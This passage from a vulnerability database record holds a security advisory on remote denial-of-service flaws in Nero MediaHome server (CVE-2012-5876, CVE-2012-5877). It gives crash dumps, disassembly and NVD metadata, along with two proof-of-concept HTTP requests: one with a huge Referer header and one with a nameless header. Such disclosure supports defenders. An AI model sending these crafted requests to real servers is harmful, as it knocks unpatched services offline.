AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\r\nEBX: 003e0000 ( 4063232) -> Tp@>+ (heap)\r\nECX: 41414141 (1094795585) -> N/A\r\nEDX: 41414141 (1094795585) -> N/A\r\nEDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)\r\nESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\r\nEBP: 0527f828 ( 86505512) -> `' (stack)\r\nESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' | (stack)\r\n +00: 003e0000 ( 4063232) -> Tp@>+ (heap)\r\n +04: 00000021 ( 33) -> N/A\r\n +08: 003e0004 ( 4063236) -> Tp@>+ (heap)\r\n +0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' |>@'X`4' |`| (stack)\r\n +10: 7c928ccd (2089979085) -> N/A\r\n +14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c9209f8 jnz 0x7c95af5f\r\n 0x7c9209fe mov 
al,[esi+0x5]\r\n 0x7c920a01 and al,0x10\r\n 0x7c920a03 test al,0x10\r\n 0x7c920a05 mov [edi+0x5],al\r\n 0x7c920a08 jnz 0x7c920aa0\r\n 0x7c920a0e mov ecx,[esi+0xc]\r\n 0x7c920a11 lea eax,[esi+0x8]\r\n 0x7c920a14 mov edx,[eax]\r\n 0x7c920a16 mov [ebp+0xc],ecx\r\n 0x7c920a19 mov ecx,[ecx]\r\n 0x7c920a1b cmp ecx,[edx+0x4]\r\n 0x7c920a1e mov [ebp+0x14],edx\r\n 0x7c920a21 jnz 0x7c921752\r\n 0x7c920a27 cmp ecx,eax\r\n 0x7c920a29 jnz 0x7c921752\r\n 0x7c920a2f push esi\r\n 0x7c920a30 push ebx\r\n 0x7c920a31 call 0x7c920684\r\n 0x7c920a36 mov eax,[ebp+0x14]\r\n 0x7c920a39 mov ecx,[ebp+0xc]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nGET / HTTP/1.1\r\nHost: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer:[A * 265566]\r\n\r\n\r\n\r\n2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877\r\n\r\n2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.\r\n\r\nCrash details:\r\n\r\nEIP: 10003171 mov [eax+0x18],ebp\r\n EAX: 00000000 ( 0) -> N/A\r\n EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\r\n ECX: 039cddea ( 60612074) -> localhost (heap)\r\n EDX: 039cddea ( 60612074) -> localhost (heap)\r\n EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)\r\n ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)\r\n EBP: 00000009 ( 9) -> N/A\r\n ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)\r\n +00: 037bd090 ( 58445968) -> x4xx @R px?x? 
(heap)\r\n +04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)\r\n +08: 00000000 ( 0) -> N/A\r\n +0c: 00000001 ( 1) -> N/A\r\n +10: 000000b8 ( 184) -> N/A\r\n +14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x10003156 mov edx,[esi+0x8]\r\n 0x10003159 mov ebp,[esi+0xc]\r\n 0x1000315c push byte 0x1\r\n 0x1000315e push eax\r\n 0x1000315f push ecx\r\n 0x10003160 push ebx\r\n 0x10003161 mov [edi+0x40],esi\r\n 0x10003164 mov [esp+0x2c],edx\r\n 0x10003168 call 0x10002730\r\n 0x1000316d mov ecx,[esp+0x2c]\r\n 0x10003171 mov [eax+0x18],ebp\r\n 0x10003174 mov ebp,[esp+0x24]\r\n 0x10003178 add esp,0x10\r\n 0x1000317b mov [eax+0x14],ecx\r\n 0x1000317e mov edx,[ebp+0x8]\r\n 0x10003181 test edx,edx\r\n 0x10003183 mov [esp+0x14],edx\r\n 0x10003187 jnz 0x10002ff0\r\n 0x1000318d mov eax,[esp+0x24]\r\n 0x10003191 push eax\r\n 0x10003192 call 0x10002c20\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash Nero MediaHome server remotely:\r\n\r\nGET / HTTP/1.1\r\n: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer: http://www.host.com\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nVendor last response (January 9, 2013):\r\n\"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon.\"\r\n\r\nAs a temporary solution it is advised to remove the vulnerable application from your system.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23130 - https://www.htbridge.com/advisory/HTB23130 - Nero MediaHome Server Multiple Remote DoS 
vulnerabilities.\r\n[2] Nero - http://www.nero.com - Nero MediaHome server easily distributes music, videos and photos over your network.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "sourceHref": "https://www.exploit-db.com/download/24022", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:29:04", "description": "Nero MediaHome 4.5.8.0 and earlier allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an HTTP header without a name.", "cvss3": {}, "published": "2014-05-30T14:55:00", "type": "cve", "title": "CVE-2012-5877", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5877"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:nero:mediahome:4.5.8.0"], 
"id": "CVE-2012-5877", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5877", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:nero:mediahome:4.5.8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:29:01", "description": "Multiple off-by-one errors in NMMediaServerService.dll in Nero MediaHome 4.5.8.0 and earlier allow remote attackers to cause a denial of service (crash) via a long string in the (1) request line or (2) HTTP Referer header to TCP port 54444, which triggers a heap-based buffer overflow.", "cvss3": {}, "published": "2014-05-30T14:55:00", "type": "cve", "title": "CVE-2012-5876", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5876"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:nero:mediahome:4.5.8.0"], "id": "CVE-2012-5876", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5876", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:nero:mediahome:4.5.8.0:*:*:*:*:*:*:*"]}]}